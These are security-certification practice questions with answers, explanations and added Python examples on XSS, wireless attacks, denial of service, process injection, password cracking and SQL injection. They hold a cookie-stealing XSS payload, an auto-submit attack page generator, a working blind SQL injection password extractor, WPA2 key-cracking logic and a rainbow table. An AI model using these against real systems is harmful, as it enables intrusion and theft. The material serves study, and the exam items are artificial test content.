During a penetration test, a tester uses the following payload in a search field: <script>alert(document.cookie)</script>. The payload is reflected in the response without sanitization. However, the tester notices that the attack only works when the payload is submitted via a POST request, not GET. Which type of XSS is this?
A.Stored XSS
B.Reflected XSS
C.DOM-based XSS
D.Self-XSS
AnswerB
The payload is reflected immediately, making it reflected XSS.
Why this answer
Reflected XSS occurs when the payload supplied in a request is echoed back in the immediate response without ever being stored. The HTTP method does not change the classification: a reflection that only triggers on POST is still reflected XSS, because nothing is persisted server-side and the victim's own request carries the payload. The practical difference is delivery: a GET reflection can be triggered with a crafted link, while a POST-only reflection needs an attacker-controlled page that auto-submits a form to the vulnerable endpoint, which makes it harder to deliver but still exploitable and still reportable.
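The POST-only case in concrete form, as an added example rather than code from this page: a vulnerable and a hardened version of the reflecting handler, plus the auto-submitting page an attacker would host to deliver the POST. The endpoint URL, field name and handler names are assumptions for illustration.

```python
import html

PAYLOAD = "<script>alert(document.cookie)</script>"

# Vulnerable handler (constructed): the POST body parameter is interpolated into
# the HTML response unchanged, so the browser parses the payload as a script.
def render_search_vulnerable(q: str) -> str:
    return f"<h1>Results for: {q}</h1>"

# Hardened handler: same template, value HTML-encoded, so '<' becomes '&lt;' and
# the payload is displayed as text rather than executed.
def render_search_safe(q: str) -> str:
    return f"<h1>Results for: {html.escape(q, quote=True)}</h1>"

# Delivery vehicle for POST-only reflected XSS: an attacker-hosted page whose form
# submits itself to the vulnerable endpoint. The victim only has to load it; the
# browser sends the POST (with the victim's cookies) and renders the reflection.
# The payload is entity-encoded inside the value attribute, which the browser
# decodes back to the raw payload before submitting the form.
def attacker_autosubmit_page(target_url: str, field: str, payload: str) -> str:
    return (
        "<html><body>"
        f'<form id="f" method="POST" action="{html.escape(target_url, quote=True)}">'
        f'<input type="hidden" name="{field}" value="{html.escape(payload, quote=True)}">'
        "</form>"
        "<script>document.getElementById('f').submit();</script>"
        "</body></html>"
    )

if __name__ == "__main__":
    print(render_search_vulnerable(PAYLOAD))
    print(render_search_safe(PAYLOAD))
    print(attacker_autosubmit_page("https://target.example/search", "q", PAYLOAD))
```

The hardened handler escapes on output, which is the fix for reflection regardless of request method; the auto-submit page is what to keep in mind when a client argues that a POST-only reflection is "not reachable".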
An attacker sets up a fake access point with the same SSID as a legitimate corporate network. Clients connecting to this AP are prompted to enter their network credentials. Which type of attack is this?
A.Replay attack
B.Evil twin attack
C.WPS PIN attack
D.De-authentication attack
AnswerB
Evil twin replicates a legitimate SSID to trick users into connecting.
Why this answer
The attack is an evil twin attack, where a rogue AP mimics a legitimate one to capture credentials or perform man-in-the-middle.
A security analyst notices that a web server is responding very slowly to legitimate requests. The server logs show many incomplete HTTP GET requests that never complete, each opened slowly over time from many different IP addresses. Which attack is most likely occurring?
A.Ping of Death
B.HTTP flood
C.SYN flood
D.Slowloris
AnswerD
Slowloris sends slow partial HTTP headers to keep connections open.
Why this answer
Slowloris is an application-layer denial-of-service attack that opens many TCP connections and sends HTTP headers a few bytes at a time, never sending the blank line that terminates the request, so each connection stays allocated in the server's worker pool until the pool is exhausted. Its traffic volume is tiny, which is why bandwidth-based defences and SYN-flood counters miss it; the many source addresses in the scenario point to a distributed variant. Effective mitigations enforce a deadline on receiving the complete request header (Apache's mod_reqtimeout, for example) rather than relying on idle timeouts, because Slowloris sends its next header fragment just before an idle timer would fire.
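Detection logic for the scenario above, added here as an example (not from the page): the worker-pool view a server or load balancer exposes, scored for the Slowloris signature. The connection records and thresholds are constructed for illustration.

```python
from dataclasses import dataclass


@dataclass
class Conn:
    src: str            # client address
    opened: float       # epoch seconds when the TCP connection was accepted
    last_rx: float      # epoch seconds when the most recent request byte arrived
    bytes_rx: int       # request bytes received so far
    headers_done: bool  # has the CRLFCRLF that ends the request header arrived?


STALL_SECS = 30.0         # legitimate clients finish their headers in well under this
MAX_PARTIAL_BYTES = 1024  # a Slowloris request stays tiny however long it lives
POOL_ALARM_RATIO = 0.5    # alarm when half the worker pool is held by partial requests


def is_stalled(c: Conn, now: float) -> bool:
    """Slowloris signature: old connection, header never finished, almost no data.
    last_rx is deliberately NOT consulted: the attacker sends a header line every
    few seconds, so an idle-timeout check always sees recent activity."""
    return (not c.headers_done
            and now - c.opened >= STALL_SECS
            and c.bytes_rx <= MAX_PARTIAL_BYTES)


def assess(conns, now: float, pool_size: int) -> dict:
    stalled = [c for c in conns if is_stalled(c, now)]
    ratio = len(stalled) / pool_size
    return {
        "stalled": len(stalled),
        "distinct_sources": len({c.src for c in stalled}),
        "pool_ratio": round(ratio, 2),
        "verdict": "slowloris" if ratio >= POOL_ALARM_RATIO else "normal",
    }


def sample_connections(now: float) -> list:
    """Constructed connection table (not real telemetry): 150 attack connections
    from 60 addresses, opened minutes ago and still dribbling header bytes, plus
    20 legitimate connections with complete headers."""
    conns = []
    for i in range(150):
        conns.append(Conn(src=f"203.0.113.{i % 60 + 1}", opened=now - 120 - i,
                          last_rx=now - (i % 10), bytes_rx=200 + i, headers_done=False))
    for i in range(20):
        conns.append(Conn(src=f"198.51.100.{i + 1}", opened=now - 0.5,
                          last_rx=now - 0.4, bytes_rx=700, headers_done=True))
    return conns


if __name__ == "__main__":
    now = 1_700_000_000.0
    print(assess(sample_connections(now), now, pool_size=256))
```

The same three fields (age, header-complete flag, bytes received) are what a request-header timeout enforces on the server side; an HTTP flood would show the opposite profile, many complete requests per second from each source.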
An IoT device uses the MQTT protocol without TLS. A security tester connects to the broker and subscribes to all topics using '#'. What is the tester MOST likely able to accomplish?
A.Perform a denial of service on the broker
B.Eavesdrop on all MQTT communications
C.Inject malicious control commands
D.Replay previously captured messages
AnswerB
By subscribing to '#' (wildcard), the tester receives all messages published to the broker, enabling full eavesdropping.
Why this answer
A broker that requires no authentication and enforces no topic access controls lets any client subscribe; the absence of TLS additionally exposes the traffic to sniffing on the wire. Subscribing to the '#' wildcard delivers every message published to the broker, which is passive interception of sensitive data rather than active manipulation such as replay or command injection. One check to remember: the MQTT specification excludes topics beginning with '$' (the broker's '$SYS/' status tree, for example) from wildcard matches, so those require a separate '$SYS/#' subscription.
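Added example (not from the page): the SUBSCRIBE packet a tester sends for '#', the SUBACK that tells whether the broker granted or refused it, and the topic-filter rules that decide which published messages arrive. Packet layouts follow MQTT 3.1.1; the topic names are constructed.

```python
def _varint(n: int) -> bytes:
    """MQTT 'remaining length': base-128 digits with a continuation bit."""
    out = bytearray()
    while True:
        byte, n = n % 128, n // 128
        out.append((byte | 0x80) if n else byte)
        if not n:
            return bytes(out)


def _read_varint(buf: bytes, pos: int):
    value, mult = 0, 1
    while True:
        b = buf[pos]
        pos += 1
        value += (b & 0x7F) * mult
        if not b & 0x80:
            return value, pos
        mult *= 128


def _utf8(s: str) -> bytes:
    data = s.encode("utf-8")
    return len(data).to_bytes(2, "big") + data


def encode_subscribe(packet_id: int, filters, qos: int = 0) -> bytes:
    """SUBSCRIBE (MQTT 3.1.1 section 3.8): fixed header 0x82, remaining length,
    packet identifier, then (topic filter, requested QoS) pairs."""
    body = packet_id.to_bytes(2, "big")
    body += b"".join(_utf8(f) + bytes([qos]) for f in filters)
    return bytes([0x82]) + _varint(len(body)) + body


def decode_suback(pkt: bytes):
    """SUBACK (section 3.9): (packet_id, [granted QoS per filter, 0x80 = refused])."""
    if pkt[0] != 0x90:
        raise ValueError("not a SUBACK")
    length, pos = _read_varint(pkt, 1)
    packet_id = int.from_bytes(pkt[pos:pos + 2], "big")
    return packet_id, list(pkt[pos + 2:pos + length])


def topic_matches(filt: str, topic: str) -> bool:
    """Filter matching per section 4.7: '+' is exactly one level, '#' is the rest
    (valid only as the last level), and wildcard filters never match topics that
    begin with '$', so a bare '#' does not deliver the $SYS tree."""
    if topic.startswith("$") and filt[:1] in ("#", "+"):
        return False
    f, t = filt.split("/"), topic.split("/")
    for i, level in enumerate(f):
        if level == "#":
            return i == len(f) - 1
        if i >= len(t) or (level != "+" and level != t[i]):
            return False
    return len(f) == len(t)


# Constructed topics a broker might carry.
PUBLISHED_TOPICS = ["sensors/temp", "home/door/lock", "$SYS/broker/clients/connected"]


def captured_by(filt: str) -> list:
    return [t for t in PUBLISHED_TOPICS if topic_matches(filt, t)]


if __name__ == "__main__":
    print(encode_subscribe(1, ["#"]).hex())            # 82 06 | 00 01 | 00 01 '#' | 00
    print(decode_suback(bytes.fromhex("9003000100")))  # granted at QoS 0
    print(decode_suback(bytes.fromhex("9003000180")))  # refused: the broker enforces ACLs
    print(captured_by("#"), captured_by("$SYS/#"))
```

A SUBACK return code of 0x80 for the '#' filter is the quick sign that the broker has topic ACLs in place even when it accepts anonymous connections.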
During a penetration test, an ethical hacker captures a WPA2 handshake and successfully cracks the PSK. Which additional action must be taken to decrypt previously captured traffic?
A.Compute the Pairwise Master Key Identifier (PMKID) from the PSK and AP MAC.
B.Capture the nonce values from the access point.
C.Use the PSK directly to compute the Michael Integrity Check (MIC).
D.Obtain the Group Temporal Key (GTK) from the access point.
AnswerA
The PMKID confirms that the cracked PSK yields the PMK actually in use; the PTK needed for decryption is then derived from that PMK and the captured handshake material.
Why this answer
Option A is correct because cracking the WPA2 Pre-Shared Key (PSK) only gives the Pairwise Master Key (PMK), derived with PBKDF2-HMAC-SHA1 from the passphrase and SSID over 4096 iterations. Decrypting traffic requires the Pairwise Transient Key (PTK), computed from the PMK, the AP nonce (ANonce), the client nonce (SNonce) and both MAC addresses. The nonces and MACs are present in the captured 4-way handshake; the PMKID, HMAC-SHA1-128(PMK, "PMK Name" || AP MAC || STA MAC), is the value that confirms the recovered PMK belongs to this AP and client pair before the PTK is derived from it.
Computing the PMKID from the cracked PSK and the AP and client MACs lets tools such as aircrack-ng confirm the PMK and then derive the PTK, whose temporal key (TK) decrypts the captured unicast traffic. In practice airdecap-ng or Wireshark performs the whole chain when given the passphrase, the SSID and a capture containing the handshake. Note that every client session has its own nonces, so only sessions whose 4-way handshake was captured can be decrypted, and WPA3-SAE sessions cannot be decrypted from a passphrase at all.
Exam trap
The trap here is that candidates often think the PSK alone is sufficient to decrypt traffic, but the PSK only gives the PMK; the PTK requires the nonces and MACs from the handshake, and the PMKID is the verification step that ensures the correct PMK is used for decryption.
How to eliminate wrong answers
Option B is wrong because the nonce values (ANonce and SNonce) are already captured as part of the WPA2 4-way handshake; capturing them again is unnecessary and does not enable decryption without the PMK. Option C is wrong because the Message Integrity Check (MIC) is a field in the handshake messages used to verify integrity, computed with the KCK portion of the PTK, not a value from which encryption keys are derived; computing the MIC directly from the PSK is meaningless and does not yield the PTK needed for decryption. Option D is wrong because the Group Temporal Key (GTK) protects only broadcast and multicast traffic and is delivered in handshake message 3 encrypted with the KEK half of the PTK; it cannot be obtained without first having the PTK, and the GTK alone cannot decrypt unicast traffic.
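The derivation chain in code, as an added example (not the page's or any tool's code): PSK to PMK, PMKID, PTK, and the EAPOL MIC check a cracker performs per candidate passphrase. The passphrase/SSID pair is the PMK test vector from IEEE 802.11 Annex H; the MAC addresses, nonces and EAPOL frame bytes are constructed.

```python
import hashlib
import hmac


def derive_pmk(passphrase: str, ssid: str) -> bytes:
    """WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes)."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def derive_pmkid(pmk: bytes, ap_mac: bytes, sta_mac: bytes) -> bytes:
    """PMKID = HMAC-SHA1-128(PMK, "PMK Name" || AA || SPA). It names the PMK for one
    AP/client pair; matching it confirms a cracked PSK before PTK derivation."""
    return hmac.new(pmk, b"PMK Name" + ap_mac + sta_mac, hashlib.sha1).digest()[:16]


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """IEEE 802.11 PRF-n: concatenated HMAC-SHA1(key, label || 0x00 || data || i)."""
    out, i = b"", 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def derive_ptk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK = PRF-384(PMK, "Pairwise key expansion", min/max(MACs) || min/max(nonces)).
    CCMP layout: KCK (16) | KEK (16) | TK (16)."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf(pmk, b"Pairwise key expansion", data, 48)


def eapol_mic(kck: bytes, frame_mic_zeroed: bytes) -> bytes:
    """Key descriptor version 2 (WPA2/AES): HMAC-SHA1 over the EAPOL-Key frame with
    its MIC field zeroed, truncated to 16 bytes."""
    return hmac.new(kck, frame_mic_zeroed, hashlib.sha1).digest()[:16]


# Constructed handshake material. "IEEE"/"password" is the PMK test vector from
# IEEE 802.11 Annex H; MACs, nonces and the frame bytes below are made up, and the
# frame only loosely mimics the EAPOL-Key layout (it is not a real capture).
SSID, PASSPHRASE = "IEEE", "password"
AP_MAC = bytes.fromhex("001122334455")
STA_MAC = bytes.fromhex("66778899aabb")
ANONCE = bytes(range(32))
SNONCE = bytes(range(32, 64))
MSG2_MIC_ZEROED = (b"\x01\x03\x00\x75\x02\x01\x0a\x00" + b"\x00" * 8
                   + SNONCE + b"\x00" * 48)


def mic_for(passphrase: str) -> bytes:
    pmk = derive_pmk(passphrase, SSID)
    ptk = derive_ptk(pmk, AP_MAC, STA_MAC, ANONCE, SNONCE)
    return eapol_mic(ptk[:16], MSG2_MIC_ZEROED)


# The MIC that would have been read out of captured message 2.
CAPTURED_MIC = mic_for(PASSPHRASE)


def candidate_is_correct(passphrase: str) -> bool:
    """What a cracker does per candidate: PMK -> PTK -> KCK -> recompute the MIC."""
    return hmac.compare_digest(mic_for(passphrase), CAPTURED_MIC)


def session_keys(passphrase: str) -> dict:
    pmk = derive_pmk(passphrase, SSID)
    ptk = derive_ptk(pmk, AP_MAC, STA_MAC, ANONCE, SNONCE)
    return {"pmk": pmk, "pmkid": derive_pmkid(pmk, AP_MAC, STA_MAC),
            "kck": ptk[:16], "kek": ptk[16:32], "tk": ptk[32:48]}


if __name__ == "__main__":
    keys = session_keys(PASSPHRASE)
    print("PMK  ", keys["pmk"].hex())
    print("PMKID", keys["pmkid"].hex())
    print("TK   ", keys["tk"].hex(), "<- decrypts this client's CCMP frames")
    print("password:", candidate_is_correct("password"),
          "passw0rd:", candidate_is_correct("passw0rd"))
```

Everything after the PMK line is cheap; the 4096-iteration PBKDF2 is the cost per candidate, which is why cracking speed is measured in PMKs per second and why the nonces and MACs must come from a captured handshake rather than be guessed.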
During a penetration test of a corporate wireless network, you capture a WPA2 handshake and successfully recover the PSK. Later, you notice that some clients are using WPA3-Personal. Which attack could be used to downgrade a WPA3 client to WPA2 and capture its handshake?
A.Perform a PMKID attack on the WPA3 client to capture the handshake.
B.Use a WPS PIN brute-force attack against the WPA3 client.
C.Send deauthentication packets to the WPA3 client and capture the reconnection handshake.
D.Set up a rogue access point broadcasting a WPA2 network with the same SSID, forcing the client to reconnect using WPA2.
AnswerD
Rogue AP can entice client to downgrade.
Why this answer
Option D is correct because a WPA3-Personal client configured for transition mode (mixed WPA3/WPA2) will associate with an AP that advertises only WPA2-PSK. A rogue AP broadcasting the same SSID with WPA2-only capability therefore draws such a client into a WPA2 4-way handshake, which can be captured and cracked offline; the recovered PSK is useful against the real network only if the same passphrase is configured for both modes. Clients enforcing WPA3-only, or that have received the Transition Disable indication from the legitimate AP, refuse the downgrade, so the result has to be checked per client.
Exam trap
EC-Council often tests the misconception that deauthentication alone can force a protocol downgrade, but in WPA3, deauthentication only triggers a reconnection using the same security protocol unless the AP changes its capabilities.
How to eliminate wrong answers
Option A is wrong because a PMKID attack targets WPA/WPA2-PSK access points that include a PMKID in the first EAPOL frame; it recovers the passphrase offline without a full handshake and downgrades nothing. Under WPA3-SAE the PMK comes from the Dragonfly exchange rather than directly from the passphrase, so a captured PMKID cannot be brute-forced. Option B is wrong because WPS PIN brute-force (reaver, for example) targets a WPS-enabled access point, not a client, and WPA3-Personal does not use WPS. Option C is wrong because deauthentication only makes a WPA3 client reconnect with the security mode the real AP offers, and since WPA3 mandates Protected Management Frames a forged deauthentication frame is rejected by a WPA3 association anyway; deauthentication is used alongside a rogue AP only to speed up the reconnection, not to cause the downgrade.
A security analyst notices that a server is sending an unusually high number of SYN packets to multiple external hosts, but the connections are never completed. The server is most likely involved in which type of attack?
A.Ping of Death
B.Smurf attack
C.UDP flood
D.SYN flood
AnswerD
Correct. A SYN flood sends many SYN packets with no final ACK, overwhelming the target.
Why this answer
A SYN flood sends large numbers of TCP SYN segments and never completes the handshake (the final ACK is withheld or the source address is spoofed), filling the target's half-open connection backlog. Here the analyst's own server is the source of the SYNs, so it has most likely been compromised or enrolled in a botnet and is launching the flood against the external hosts; the right response is to isolate and investigate the host, not merely rate-limit its outbound traffic.
After a security incident, an analyst retrieves a suspicious file. The analyst runs the 'strings' command on it and sees references to 'CreateRemoteThread' and 'WriteProcessMemory'. Which technique does this indicate?
A.DLL hijacking
B.Privilege escalation
C.Process injection
D.Buffer overflow
AnswerC
CreateRemoteThread and WriteProcessMemory are used to inject code into a remote process.
Why this answer
These Windows API functions form the classic process injection chain: OpenProcess obtains a handle to the target, VirtualAllocEx reserves memory inside it, WriteProcessMemory copies shellcode or a DLL path into that memory, and CreateRemoteThread starts a thread in the target to execute it. Malware uses this to run inside a trusted process and evade detection. Seeing the names in `strings` output means the import table or a string reference is present, which is a strong but not conclusive indicator: debuggers and some security products import the same functions, so confirm with dynamic analysis or by identifying which process the sample targets.
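Added example, not from the page: a minimal `strings` over a constructed byte blob and a triage rule that flags the injection API chain. The sample bytes and the API list are assumptions for illustration.

```python
import re

# Win32/native APIs that appear in the common injection chains (constructed list).
INJECTION_APIS = {
    "OpenProcess", "VirtualAllocEx", "WriteProcessMemory", "CreateRemoteThread",
    "NtCreateThreadEx", "QueueUserAPC", "SetThreadContext", "NtMapViewOfSection",
}


def extract_strings(blob: bytes, min_len: int = 4) -> list:
    """A minimal `strings`: printable-ASCII runs plus UTF-16LE runs (the encoding
    Windows binaries use for paths and messages) of at least min_len characters.
    GNU strings needs -e l to show the wide ones; here both are returned."""
    ascii_runs = [m.group().decode("ascii")
                  for m in re.finditer(rb"[\x20-\x7e]{%d,}" % min_len, blob)]
    wide_runs = [m.group().decode("utf-16le")
                 for m in re.finditer(rb"(?:[\x20-\x7e]\x00){%d,}" % min_len, blob)]
    return ascii_runs + wide_runs


def injection_indicators(blob: bytes) -> list:
    """API names found inside any extracted string. Import-by-name entries carry a
    2-byte hint before the name, so substring matching beats exact equality."""
    runs = extract_strings(blob)
    return sorted(api for api in INJECTION_APIS if any(api in s for s in runs))


def triage(blob: bytes) -> dict:
    apis = injection_indicators(blob)
    # WriteProcessMemory + CreateRemoteThread is the classic shellcode/DLL injection pair.
    classic_pair = {"WriteProcessMemory", "CreateRemoteThread"} <= set(apis)
    return {"apis": apis,
            "verdict": "process injection" if classic_pair else "inconclusive"}


# Constructed sample: a fragment shaped like a PE import-by-name table, some
# binary filler, and a wide-string DLL path. Not a real binary.
SAMPLE = (b"\x00\x00OpenProcess\x00\x00\x00VirtualAllocEx\x00\x00\x00"
          b"WriteProcessMemory\x00\x00\x00CreateRemoteThread\x00KERNEL32.dll\x00"
          + bytes(range(256))
          + "C:\\Users\\Public\\payload.dll".encode("utf-16le") + b"\x00\x00")
BENIGN = b"\x00\x00GetProcAddress\x00\x00\x00ReadFile\x00KERNEL32.dll\x00"


if __name__ == "__main__":
    print(triage(SAMPLE))
    print(triage(BENIGN))
    print([s for s in extract_strings(SAMPLE) if s.endswith(".dll")])
```

The wide-string pass matters in practice: the DLL path that a DLL-injecting loader writes into the target with WriteProcessMemory is usually stored as UTF-16, and an ASCII-only `strings` run misses it.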
Which type of password cracking attack uses a precomputed table of hash chains to reverse hashes quickly?
A.Rainbow table attack
B.Dictionary attack
C.Brute-force attack
D.Hybrid attack
AnswerA
Why this answer
Rainbow tables trade storage for cracking time: a table stores only the start and end of each precomputed hash chain, and a lookup regenerates the relevant chain to recover the plaintext for an unsalted hash far faster than brute force. Tools such as RainbowCrack and Ophcrack use them, classically against LM and NTLM hashes; per-user salting defeats them because every salt value would need its own table.
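A working rainbow table over a toy password space, added as an example (not the page's material): chain generation with a step-dependent reduction function, a table that stores only endpoints, and the lookup that regenerates a chain to recover the plaintext. The charset, chain length and start points are constructed.

```python
import hashlib
import string

CHARSET = string.ascii_lowercase
PW_LEN = 3                      # 26**3 = 17,576 candidates: small enough to run instantly
SPACE = len(CHARSET) ** PW_LEN
CHAIN_LEN = 20                  # plaintexts covered per stored (start, end) pair


def hash_pw(pw: str) -> bytes:
    return hashlib.sha256(pw.encode()).digest()


def int_to_pw(n: int) -> str:
    chars = []
    for _ in range(PW_LEN):
        chars.append(CHARSET[n % len(CHARSET)])
        n //= len(CHARSET)
    return "".join(chars)


def reduce_hash(digest: bytes, step: int) -> str:
    """Reduction function R_step: maps a digest back into the password space.
    Mixing in the step index is what makes the table 'rainbow': two chains that
    collide at different positions do not merge."""
    return int_to_pw((int.from_bytes(digest[:8], "big") + step) % SPACE)


def chain(start: str) -> list:
    """p0 = start, p_{i+1} = R_i(H(p_i)). Returns p0..p_CHAIN_LEN; the last is the endpoint."""
    pts = [start]
    for step in range(CHAIN_LEN):
        pts.append(reduce_hash(hash_pw(pts[-1]), step))
    return pts


def build_table(starts) -> dict:
    """Only endpoints are stored, keyed to their start(s); merged endpoints keep all starts."""
    table = {}
    for s in starts:
        table.setdefault(chain(s)[-1], []).append(s)
    return table


def coverage(starts) -> int:
    """Distinct plaintexts the table can recover (merges make this < starts * CHAIN_LEN)."""
    return len({p for s in starts for p in chain(s)[:-1]})


def lookup(table: dict, target: bytes):
    """Assume the target's plaintext sits at position k of some chain; finish that
    chain from k and check whether the endpoint is stored. Try every k."""
    for k in range(CHAIN_LEN - 1, -1, -1):
        pw = reduce_hash(target, k)
        for step in range(k + 1, CHAIN_LEN):
            pw = reduce_hash(hash_pw(pw), step)
        for start in table.get(pw, []):
            # Regenerate the chain from its start and look for the preimage.
            for cand in chain(start)[:-1]:
                if hash_pw(cand) == target:
                    return cand
            # No hit: a false alarm caused by a chain merge; keep trying.
    return None


# Deterministic, constructed start points (a real table would draw them at random).
STARTS = [int_to_pw((i * 7919) % SPACE) for i in range(800)]


if __name__ == "__main__":
    table = build_table(STARTS)
    print(f"{len(table)} endpoints stored, {coverage(STARTS)} of {SPACE} passwords covered")
    victim = chain(STARTS[0])[7]          # a password known to lie inside a chain
    print(victim, "->", lookup(table, hash_pw(victim)))
    print("Zzz ->", lookup(table, hash_pw("Zzz")))   # outside the charset: not found
```

Storage is 800 (start, end) pairs instead of 17,576 (password, hash) pairs, and a lookup costs at most CHAIN_LEN squared over two hash operations. A salted hash breaks this because the salt would have to be part of every reduction, so the whole table would be valid for that one salt only.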
A web application is vulnerable to SQL injection. Which THREE of the following techniques can be used to extract data from the database using blind SQL injection?
Select 3 answers
A.Time-based
B.Error-based
C.Boolean-based
D.Out-of-band
E.Union-based
AnswersA, C, D
Time-based uses delays to infer true/false conditions.
Why this answer
Boolean-based, time-based, and out-of-band are all types of blind SQL injection. Error-based and union-based are in-band techniques, not blind.
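Boolean-based blind extraction end to end, as an added example (not from the page): a string-built query against a constructed in-memory SQLite database, a parameterised version of the same lookup, and the binary-search extraction that recovers a column one character at a time from a yes/no oracle. The table, data and payload shape are assumptions.

```python
import sqlite3


def make_db() -> sqlite3.Connection:
    """Constructed in-memory target database."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)",
                   [(1, "admin", "S3cr3t!"), (2, "bob", "hunter2")])
    return db


def user_exists_vulnerable(db, username: str) -> bool:
    """String-built query (the vulnerability). The page only reveals found / not
    found, so neither error messages nor UNION output are available: a blind case."""
    row = db.execute(f"SELECT id FROM users WHERE username = '{username}'").fetchone()
    return row is not None


def user_exists_safe(db, username: str) -> bool:
    """Parameterised query: the payload is compared as a literal username."""
    row = db.execute("SELECT id FROM users WHERE username = ?", (username,)).fetchone()
    return row is not None


def extract_password(oracle, target_user: str = "admin", max_len: int = 32) -> str:
    """Boolean-based blind extraction. Each request answers one yes/no question, so a
    binary search needs about 7 requests per character instead of up to 95."""
    def ask(condition: str) -> bool:
        # Payload shape: close the quote, AND in our condition, comment out the rest.
        return oracle(f"{target_user}' AND ({condition}) -- ")

    def least_n_where_false(lo: int, hi: int, expr: str) -> int:
        # Smallest n in [lo, hi] for which "expr > n" is false, i.e. the value of expr.
        while lo < hi:
            mid = (lo + hi) // 2
            if ask(f"{expr} > {mid}"):
                lo = mid + 1
            else:
                hi = mid
        return lo

    length = least_n_where_false(0, max_len, "length(password)")
    return "".join(
        chr(least_n_where_false(32, 126, f"unicode(substr(password,{pos},1))"))
        for pos in range(1, length + 1))


if __name__ == "__main__":
    db = make_db()
    sent = []

    def counted(payload: str) -> bool:
        sent.append(payload)
        return user_exists_vulnerable(db, payload)

    print("vulnerable:", repr(extract_password(counted)), "in", len(sent), "requests")
    print("first payload:", sent[0])
    print("hardened:  ", repr(extract_password(lambda u: user_exists_safe(db, u))))
```

Against the parameterised lookup every probe is simply a username that does not exist, so the oracle always answers no and the extraction yields nothing. When the response content gives no true/false difference at all, the time-based variant runs the same binary search on a delay condition (for example a conditional SLEEP on MySQL) and reads the answer from the response time; out-of-band variants push the answer through a DNS or HTTP request the database server is made to issue.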
A security analyst reviews the iptables firewall configuration on a Linux server acting as a gateway for a small office. The server has two interfaces: eth0 (external) and eth1 (internal, 192.168.1.0/24). Based on the exhibit, which of the following is a valid security concern?
A.All traffic to the loopback interface is accepted, which could allow local attacks to bypass firewall rules.
B.The OUTPUT chain policy is set to ACCEPT, which allows any outbound traffic.
C.The FORWARD chain only allows traffic from 192.168.1.0/24 to any destination, which is too permissive.
D.UDP port 53 is allowed, which could permit DNS tunneling attacks.
AnswerA
Loopback acceptance can be exploited if local services are vulnerable.
Why this answer
Option A is correct because the iptables rules show that all traffic to the loopback interface (lo) is accepted in the INPUT chain. This means any process on the local host can reach services bound to 127.0.0.1 without being filtered, so an attacker who gains local access can use the loopback to talk to services that the external-facing rules were meant to protect. Accepting loopback traffic is standard practice and many local daemons depend on it, so the practical hardening is not to drop it but to pair it with an anti-spoofing rule that drops packets with a 127.0.0.0/8 source arriving on eth0 or eth1, and to require authentication on loopback-bound services (database sockets, management consoles) rather than relying on the firewall alone.
Exam trap
The trap here is that candidates often overlook the loopback interface rules and focus on external-facing chains, assuming that only external interfaces matter for security, while the question specifically tests awareness of local attack vectors through the loopback interface.
How to eliminate wrong answers
Option B is wrong because the OUTPUT chain policy being set to ACCEPT is not inherently a security concern; it is a common default that allows the gateway itself to initiate outbound connections, which is expected for normal operation. Option C is wrong because the FORWARD chain rule only allowing traffic from 192.168.1.0/24 to any destination is a typical and correct configuration for a gateway that forwards internal traffic to the internet; it is not 'too permissive' as it restricts forwarding to the internal subnet only. Option D is wrong because allowing UDP port 53 (DNS) is necessary for name resolution and does not inherently permit DNS tunneling; tunneling requires additional exploitation and is not a direct consequence of allowing standard DNS traffic.
Which THREE of the following are techniques used in session hijacking? (Select three.)
Select 3 answers
A.ARP poisoning
B.DNS amplification
C.TCP sequence prediction
D.Cookie theft
E.MAC flooding
AnswersA, C, D
Correct. ARP poisoning enables MITM, which can be used to hijack sessions.
Why this answer
TCP sequence prediction allows an attacker to guess sequence numbers and inject packets. Cookie theft (e.g., via XSS) steals session tokens. ARP poisoning enables MITM to intercept and hijack sessions.
A penetration tester wants to perform a stealthy TCP scan that does not complete the three-way handshake. Which Nmap flag should be used?
A.-sU
B.-sS
C.-sV
D.-sT
AnswerB
-sS is the SYN stealth scan that doesn't complete the handshake.
Why this answer
Option B (-sS) is correct because it performs a SYN scan, which sends a TCP SYN and waits for a SYN-ACK (open) or RST (closed) without completing the three-way handshake: Nmap answers a SYN-ACK with a RST rather than an ACK. Because no full connection is established, the probe never reaches the application and does not appear in application logs, which is what 'stealth' historically referred to; host firewalls and IDS sensors log half-open probes readily, so do not count on it against a monitored network. Note that -sS is also Nmap's default scan type when run with raw-socket privileges, and it requires them.
Exam trap
The trap here is that candidates often confuse -sS (SYN scan) with -sT (TCP connect scan), mistakenly thinking that -sT is stealthy because it uses TCP, but -sT actually completes the full handshake and is easily logged, while -sS is the true stealthy option.
How to eliminate wrong answers
Option A (-sU) is wrong because it performs a UDP scan, not a TCP scan, and UDP is connectionless, so it does not involve a three-way handshake at all. Option C (-sV) is wrong because it is used for version detection, which requires completing the three-way handshake to probe services, not for stealthy scanning. Option D (-sT) is wrong because it performs a full TCP connect scan, which completes the three-way handshake and is not stealthy, as it is more likely to be logged by the target system.
A security analyst wants to perform passive reconnaissance on a target domain. Which TWO of the following methods are considered passive? (Choose 2)
Select 2 answers
A.WHOIS lookup
B.Shodan search
C.Telnet banner grab
D.Ping sweep
E.Nmap SYN scan
AnswersA, B
Queries public WHOIS databases without contacting the target.
Why this answer
WHOIS lookup is passive because it queries public registration databases (e.g., ARIN, RIPE) via the WHOIS protocol (RFC 3912) to retrieve domain ownership, registrar, and name server information without sending any packets to the target's own infrastructure. This data is publicly available and does not interact with the target's servers or network, making it a classic passive reconnaissance technique.
Exam trap
EC-Council often tests the passive/active distinction by listing Shodan next to active scanning tools such as Nmap, leading candidates to classify Shodan as active because it reports open ports and banners. Shodan is passive because the analyst queries Shodan's stored results from scans that Shodan itself performed earlier; the target receives no new traffic from the analyst. Telnet banner grabbing, ping sweeps and SYN scans all send packets to the target and are active.
Which of the following best describes the difference between active and passive reconnaissance?
A.Active reconnaissance is legal, while passive reconnaissance is not
